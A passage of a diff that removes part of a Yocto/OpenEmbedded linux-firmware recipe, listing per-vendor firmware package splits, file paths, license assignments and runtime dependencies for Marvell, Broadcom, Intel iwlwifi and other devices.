-FILES_${PN}-sd8887 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8887_uapsta.bin \ -" -FILES_${PN}-sd8897 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8897_uapsta.bin \ -" -do_install_append() { - # The kernel 5.6.x driver still uses the old name, provide a symlink for - # older kernels - ln -fs sdsd8997_combo_v4.bin ${D}${nonarch_base_libdir}/firmware/mrvl/sd8997_uapsta.bin -} -FILES_${PN}-sd8997 = " \ - ${nonarch_base_libdir}/firmware/mrvl/sd8997_uapsta.bin \ - ${nonarch_base_libdir}/firmware/mrvl/sdsd8997_combo_v4.bin \ -" -FILES_${PN}-usb8997 = " \ - ${nonarch_base_libdir}/firmware/mrvl/usbusb8997_combo_v4.bin \ -" - -RDEPENDS_${PN}-sd8686 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8688 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8787 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8797 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8801 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8887 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8897 += "${PN}-marvell-license" -RDEPENDS_${PN}-sd8997 += "${PN}-marvell-license" -RDEPENDS_${PN}-usb8997 += "${PN}-marvell-license" - -# For netronome -LICENSE_${PN}-netronome = "Firmware-netronome" - -FILES_${PN}-netronome-license = " \ - ${nonarch_base_libdir}/firmware/LICENCE.Netronome \ -" -FILES_${PN}-netronome = " \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0081*.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0096*.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0097*.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0099*.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0011_2x40.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0058-0012_2x40.nffw \ - ${nonarch_base_libdir}/firmware/netronome/nic_AMDA0078-0011_1x100.nffw \ - ${nonarch_base_libdir}/firmware/netronome/bpf \ - ${nonarch_base_libdir}/firmware/netronome/flower \ - ${nonarch_base_libdir}/firmware/netronome/nic \ - ${nonarch_base_libdir}/firmware/netronome/nic-sriov \ -" - -RDEPENDS_${PN}-netronome += "${PN}-netronome-license" - -# For Nvidia -LICENSE_${PN}-nvidia-gpu = "Firmware-nvidia" -LICENSE_${PN}-nvidia-tegra = "Firmware-nvidia" -LICENSE_${PN}-nvidia-tegra-k1 = "Firmware-nvidia" -LICENSE_${PN}-nvidia-license = "Firmware-nvidia" - -FILES_${PN}-nvidia-gpu = "${nonarch_base_libdir}/firmware/nvidia" -FILES_${PN}-nvidia-tegra = " \ - ${nonarch_base_libdir}/firmware/nvidia/tegra* \ - ${nonarch_base_libdir}/firmware/nvidia/gm20b \ - ${nonarch_base_libdir}/firmware/nvidia/gp10b \ -" -FILES_${PN}-nvidia-tegra-k1 = " \ - ${nonarch_base_libdir}/firmware/nvidia/tegra124 \ - ${nonarch_base_libdir}/firmware/nvidia/gk20a \ -" -FILES_${PN}-nvidia-license = "${nonarch_base_libdir}/firmware/LICENCE.nvidia" - -RDEPENDS_${PN}-nvidia-gpu += "${PN}-nvidia-license" -RDEPENDS_${PN}-nvidia-tegra += "${PN}-nvidia-license" -RDEPENDS_${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license" - -# For RSI RS911x WiFi -LICENSE_${PN}-rs9113 = "WHENCE" -LICENSE_${PN}-rs9116 = "WHENCE" - -FILES_${PN}-rs9113 = " ${nonarch_base_libdir}/firmware/rsi/rs9113*.rps " -FILES_${PN}-rs9116 = " ${nonarch_base_libdir}/firmware/rsi/rs9116*.rps " - -RDEPENDS_${PN}-rs9113 += "${PN}-whence-license" -RDEPENDS_${PN}-rs9116 += "${PN}-whence-license" - -# For rtl -LICENSE_${PN}-rtl8188 = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8192cu = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8192ce = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8192su = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8723 = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8821 = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl-license = "Firmware-rtlwifi_firmware" -LICENSE_${PN}-rtl8168 = "WHENCE" - -FILES_${PN}-rtl-license = " \ - ${nonarch_base_libdir}/firmware/LICENCE.rtlwifi_firmware.txt \ -" -FILES_${PN}-rtl8188 = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8188*.bin \ -" -FILES_${PN}-rtl8192cu = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8192cufw*.bin \ -" -FILES_${PN}-rtl8192ce = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8192cfw*.bin \ -" -FILES_${PN}-rtl8192su = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8712u.bin \ -" -FILES_${PN}-rtl8723 = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8723*.bin \ -" -FILES_${PN}-rtl8821 = " \ - ${nonarch_base_libdir}/firmware/rtlwifi/rtl8821*.bin \ -" -FILES_${PN}-rtl8168 = " \ - ${nonarch_base_libdir}/firmware/rtl_nic/rtl8168*.fw \ -" - -RDEPENDS_${PN}-rtl8188 += "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8192ce += "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8192cu += "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8192su = "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8723 += "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8821 += "${PN}-rtl-license" -RDEPENDS_${PN}-rtl8168 += "${PN}-whence-license" - -# For ti-connectivity -LICENSE_${PN}-wlcommon = "Firmware-ti-connectivity" -LICENSE_${PN}-wl12xx = "Firmware-ti-connectivity" -LICENSE_${PN}-wl18xx = "Firmware-ti-connectivity" -LICENSE_${PN}-ti-connectivity-license = "Firmware-ti-connectivity" - -FILES_${PN}-ti-connectivity-license = "${nonarch_base_libdir}/firmware/LICENCE.ti-connectivity" -# wl18xx optionally needs wl1271-nvs.bin (which itself is a symlink to -# wl127x-nvs.bin) - see linux/drivers/net/wireless/ti/wlcore/sdio.c -# and drivers/net/wireless/ti/wlcore/spi.c. -# While they're optional and actually only used to override the MAC -# address on wl18xx, driver loading will delay (by udev timout - 60s) -# if not there. So let's make it available always. Because it's a -# symlink, both need to go to wlcommon. -FILES_${PN}-wlcommon = " \ - ${nonarch_base_libdir}/firmware/ti-connectivity/TI* \ - ${nonarch_base_libdir}/firmware/ti-connectivity/wl127x-nvs.bin \ - ${nonarch_base_libdir}/firmware/ti-connectivity/wl1271-nvs.bin \ -" -FILES_${PN}-wl12xx = " \ - ${nonarch_base_libdir}/firmware/ti-connectivity/wl12* \ -" -FILES_${PN}-wl18xx = " \ - ${nonarch_base_libdir}/firmware/ti-connectivity/wl18* \ -" - -RDEPENDS_${PN}-wl12xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" -RDEPENDS_${PN}-wl18xx = "${PN}-ti-connectivity-license ${PN}-wlcommon" - -# For vt6656 -LICENSE_${PN}-vt6656 = "Firmware-via_vt6656" -LICENSE_${PN}-vt6656-license = "Firmware-via_vt6656" - -FILES_${PN}-vt6656-license = "${nonarch_base_libdir}/firmware/LICENCE.via_vt6656" -FILES_${PN}-vt6656 = " \ - ${nonarch_base_libdir}/firmware/vntwusb.fw \ -" - -RDEPENDS_${PN}-vt6656 = "${PN}-vt6656-license" - -# For broadcom - -# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e " \${PN}-$pkg \\"; done | sort -u - -LICENSE_${PN}-broadcom-license = "Firmware-broadcom_bcm43xx" -FILES_${PN}-broadcom-license = "${nonarch_base_libdir}/firmware/LICENCE.broadcom_bcm43xx" - -# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo "$i - $pkg"; echo -e "FILES_\${PN}-$pkg = \"\${nonarch_base_libdir}/firmware/brcm/$i\""; done | grep ^FILES - -FILES_${PN}-bcm43xx = "${nonarch_base_libdir}/firmware/brcm/bcm43xx-0.fw" -FILES_${PN}-bcm43xx-hdr = "${nonarch_base_libdir}/firmware/brcm/bcm43xx_hdr-0.fw" -FILES_${PN}-bcm4329-fullmac = "${nonarch_base_libdir}/firmware/brcm/bcm4329-fullmac-4.bin" -FILES_${PN}-bcm43236b = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43236b.bin" -FILES_${PN}-bcm4329 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4329-sdio.bin" -FILES_${PN}-bcm4330 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4330-sdio.*" -FILES_${PN}-bcm4334 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4334-sdio.bin" -FILES_${PN}-bcm4335 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4335-sdio.bin" -FILES_${PN}-bcm4339 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4339-sdio.bin \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac4339-sdio.bin \ -" -FILES_${PN}-bcm43241b0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b0-sdio.bin" -FILES_${PN}-bcm43241b4 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b4-sdio.bin" -FILES_${PN}-bcm43241b5 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43241b5-sdio.bin" -FILES_${PN}-bcm43242a = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43242a.bin" -FILES_${PN}-bcm43143 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43143.bin \ - ${nonarch_base_libdir}/firmware/brcm/brcmfmac43143-sdio.bin \ -" -FILES_${PN}-bcm43430a0 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430a0-sdio.*" -FILES_${PN}-bcm43455 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43455-sdio.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac43455-sdio.* \ -" -FILES_${PN}-bcm4350c2 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350c2-pcie.bin" -FILES_${PN}-bcm4350 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4350-pcie.bin" -FILES_${PN}-bcm4356 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-sdio.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-sdio.* \ -" -FILES_${PN}-bcm43569 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43569.bin" -FILES_${PN}-bcm43570 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43570-pcie.bin \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac43570-pcie.bin \ -" -FILES_${PN}-bcm4358 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4358-pcie.bin" -FILES_${PN}-bcm43602 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.bin \ - ${nonarch_base_libdir}/firmware/brcm/brcmfmac43602-pcie.ap.bin \ -" -FILES_${PN}-bcm4366b = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4366b-pcie.bin" -FILES_${PN}-bcm4366c = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4366c-pcie.bin" -FILES_${PN}-bcm4371 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4371-pcie.bin" - -# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e "LICENSE_\${PN}-$pkg = \"Firmware-broadcom_bcm43xx\"\nRDEPENDS_\${PN}-$pkg += \"\${PN}-broadcom-license\""; done -# Currently 1st one and last 6 have cypress LICENSE - -LICENSE_${PN}-bcm43xx = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43xx += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43xx-hdr = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43xx-hdr += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4329-fullmac = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4329-fullmac += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43236b = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43236b += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4329 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4329 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4330 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4330 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4334 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4334 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4335 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4335 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4339 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4339 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43241b0 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43241b0 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43241b4 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43241b4 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43241b5 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43241b5 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43242a = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43242a += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43143 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43143 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43430a0 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43430a0 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43455 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43455 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4350c2 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4350c2 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4350 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4350 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4356 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4356 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43569 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43569 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43570 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43570 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4358 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4358 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm43602 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm43602 += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4366b = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4366b += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4366c = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4366c += "${PN}-broadcom-license" -LICENSE_${PN}-bcm4371 = "Firmware-broadcom_bcm43xx" -RDEPENDS_${PN}-bcm4371 += "${PN}-broadcom-license" - -# For broadcom cypress - -LICENSE_${PN}-cypress-license = "Firmware-cypress" -FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress" - -FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd" -FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*" -FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*" -FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*" -FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \ -" -FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \ -" -FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \ - ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \ - ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \ -" - -LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress" -RDEPENDS_${PN}-bcm-0bb4-0306 += "${PN}-cypress-license" -LICENSE_${PN}-bcm43340 = "Firmware-cypress" -RDEPENDS_${PN}-bcm43340 += "${PN}-cypress-license" -LICENSE_${PN}-bcm43362 = "Firmware-cypress" -RDEPENDS_${PN}-bcm43362 += "${PN}-cypress-license" -LICENSE_${PN}-bcm43430 = "Firmware-cypress" -RDEPENDS_${PN}-bcm43430 += "${PN}-cypress-license" -LICENSE_${PN}-bcm4354 = "Firmware-cypress" -RDEPENDS_${PN}-bcm4354 += "${PN}-cypress-license" -LICENSE_${PN}-bcm4356-pcie = "Firmware-cypress" -RDEPENDS_${PN}-bcm4356-pcie += "${PN}-cypress-license" -LICENSE_${PN}-bcm4373 = "Firmware-cypress" -RDEPENDS_${PN}-bcm4373 += "${PN}-cypress-license" - -# For Broadcom bnx2-mips -# -# which is a separate case to the other Broadcom firmwares since its -# license is contained in the shared WHENCE file. - -LICENSE_${PN}-bnx2-mips = "WHENCE" -LICENSE_${PN}-whence-license = "WHENCE" - -FILES_${PN}-bnx2-mips = "${nonarch_base_libdir}/firmware/bnx2/bnx2-mips-09-6.2.1b.fw" -FILES_${PN}-whence-license = "${nonarch_base_libdir}/firmware/WHENCE" - -RDEPENDS_${PN}-bnx2-mips += "${PN}-whence-license" - -# For imx-sdma -LICENSE_${PN}-imx-sdma-imx6q = "Firmware-imx-sdma_firmware" -LICENSE_${PN}-imx-sdma-imx7d = "Firmware-imx-sdma_firmware" -LICENSE_${PN}-imx-sdma-license = "Firmware-imx-sdma_firmware" - -FILES_${PN}-imx-sdma-imx6q = "${nonarch_base_libdir}/firmware/imx/sdma/sdma-imx6q.bin" - -RPROVIDES_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" -RREPLACES_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" -RCONFLICTS_${PN}-imx-sdma-imx6q = "firmware-imx-sdma-imx6q" - -FILES_${PN}-imx-sdma-imx7d = "${nonarch_base_libdir}/firmware/imx/sdma/sdma-imx7d.bin" - -FILES_${PN}-imx-sdma-license = "${nonarch_base_libdir}/firmware/LICENSE.sdma_firmware" - -RDEPENDS_${PN}-imx-sdma-imx6q += "${PN}-imx-sdma-license" -RDEPENDS_${PN}-imx-sdma-imx7d += "${PN}-imx-sdma-license" - -# For iwlwifi -LICENSE_${PN}-iwlwifi = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-135-6 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-7 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-8 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-9 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-10 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-12 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-13 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-16 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-3160-17 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6000-4 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6000g2a-5 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6000g2a-6 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6000g2b-5 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6000g2b-6 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6050-4 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-6050-5 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-7260 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-7265 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-7265d = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-8000c = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-8265 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-9000 = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-misc = "Firmware-iwlwifi_firmware" -LICENSE_${PN}-iwlwifi-license = "Firmware-iwlwifi_firmware" - - -FILES_${PN}-iwlwifi-license = "${nonarch_base_libdir}/firmware/LICENCE.iwlwifi_firmware" -FILES_${PN}-iwlwifi-135-6 = "${nonarch_base_libdir}/firmware/iwlwifi-135-6.ucode" -FILES_${PN}-iwlwifi-3160-7 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-7.ucode" -FILES_${PN}-iwlwifi-3160-8 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-8.ucode" -FILES_${PN}-iwlwifi-3160-9 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-9.ucode" -FILES_${PN}-iwlwifi-3160-10 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-10.ucode" -FILES_${PN}-iwlwifi-3160-12 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-12.ucode" -FILES_${PN}-iwlwifi-3160-13 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-13.ucode" -FILES_${PN}-iwlwifi-3160-16 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-16.ucode" -FILES_${PN}-iwlwifi-3160-17 = "${nonarch_base_libdir}/firmware/iwlwifi-3160-17.ucode" -FILES_${PN}-iwlwifi-6000-4 = "${nonarch_base_libdir}/firmware/iwlwifi-6000-4.ucode" -FILES_${PN}-iwlwifi-6000g2a-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2a-5.ucode" -FILES_${PN}-iwlwifi-6000g2a-6 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2a-6.ucode" -FILES_${PN}-iwlwifi-6000g2b-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2b-5.ucode" -FILES_${PN}-iwlwifi-6000g2b-6 = "${nonarch_base_libdir}/firmware/iwlwifi-6000g2b-6.ucode" -FILES_${PN}-iwlwifi-6050-4 = "${nonarch_base_libdir}/firmware/iwlwifi-6050-4.ucode" -FILES_${PN}-iwlwifi-6050-5 = "${nonarch_base_libdir}/firmware/iwlwifi-6050-5.ucode" -FILES_${PN}-iwlwifi-7260 = "${nonarch_base_libdir}/firmware/iwlwifi-7260-*.ucode" -FILES_${PN}-iwlwifi-7265 = "${nonarch_base_libdir}/firmware/iwlwifi-7265-*.ucode" -FILES_${PN}-iwlwifi-7265d = "${nonarch_base_libdir}/firmware/iwlwifi-7265D-*.ucode" -FILES_${PN}-iwlwifi-8000c = "${nonarch_base_libdir}/firmware/iwlwifi-8000C-*.ucode" -FILES_${PN}-iwlwifi-8265 = "${nonarch_base_libdir}/firmware/iwlwifi-8265-*.ucode" -FILES_${PN}-iwlwifi-9000 = "${nonarch_base_libdir}/firmware/iwlwifi-9000-*.ucode" -FILES_${PN}-iwlwifi-misc = "${nonarch_base_libdir}/firmware/iwlwifi-*.ucode" - -RDEPENDS_${PN}-iwlwifi-135-6 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-7 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-8 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-9 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-10 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-12 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-13 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-16 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-3160-17 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6000-4 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6000g2a-5 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6000g2a-6 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6000g2b-5 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6000g2b-6 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6050-4 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-6050-5 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-7265d = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-8000c = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-8265 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-9000 = "${PN}-iwlwifi-license" -RDEPENDS_${PN}-iwlwifi-misc = "${PN}-iwlwifi-license" - -# -iwlwifi-misc is a "catch all" package that includes all the iwlwifi -# firmwares that are not already included in other -iwlwifi- packages. -# -iwlwifi is a virtual package that depends upon all iwlwifi packages. -# These are distinct in order to allow the -misc firmwares to be installed -# without pulling in every other iwlwifi package. -ALLOW_EMPTY_${PN}-iwlwifi = "1" -ALLOW_EMPTY_${PN}-iwlwifi-misc = "1" - -# Handle package updating for the newly merged iwlwifi groupings -RPROVIDES_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" -RREPLACES_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" -RCONFLICTS_${PN}-iwlwifi-7265 = "${PN}-iwlwifi-7265-8 ${PN}-iwlwifi-7265-9" - -RPROVIDES_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" -RREPLACES_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" -RCONFLICTS_${PN}-iwlwifi-7260 = "${PN}-iwlwifi-7260-7 ${PN}-iwlwifi-7260-8 ${PN}-iwlwifi-7260-9" - -# For ibt -LICENSE_${PN}-ibt-license = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-hw-37-7 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-hw-37-8 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-11-5 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-12-16 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-17 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-20 = "Firmware-ibt_firmware" -LICENSE_${PN}-ibt-misc = "Firmware-ibt_firmware" - -FILES_${PN}-ibt-license = "${nonarch_base_libdir}/firmware/LICENCE.ibt_firmware" -FILES_${PN}-ibt-hw-37-7 = "${nonarch_base_libdir}/firmware/intel/ibt-hw-37.7*.bseq" -FILES_${PN}-ibt-hw-37-8 = "${nonarch_base_libdir}/firmware/intel/ibt-hw-37.8*.bseq" -FILES_${PN}-ibt-11-5 = "${nonarch_base_libdir}/firmware/intel/ibt-11-5.sfi ${nonarch_base_libdir}/firmware/intel/ibt-11-5.ddc" -FILES_${PN}-ibt-12-16 = "${nonarch_base_libdir}/firmware/intel/ibt-12-16.sfi ${nonarch_base_libdir}/firmware/intel/ibt-12-16.ddc" -FILES_${PN}-ibt-17 = "${nonarch_base_libdir}/firmware/intel/ibt-17-*.sfi ${nonarch_base_libdir}/firmware/intel/ibt-17-*.ddc" -FILES_${PN}-ibt-20 = "${nonarch_base_libdir}/firmware/intel/ibt-20-*.sfi ${nonarch_base_libdir}/firmware/intel/ibt-20-*.ddc" -FILES_${PN}-ibt-misc = "${nonarch_base_libdir}/firmware/intel/ibt-*" - -RDEPENDS_${PN}-ibt-hw-37-7 = "${PN}-ibt-license" 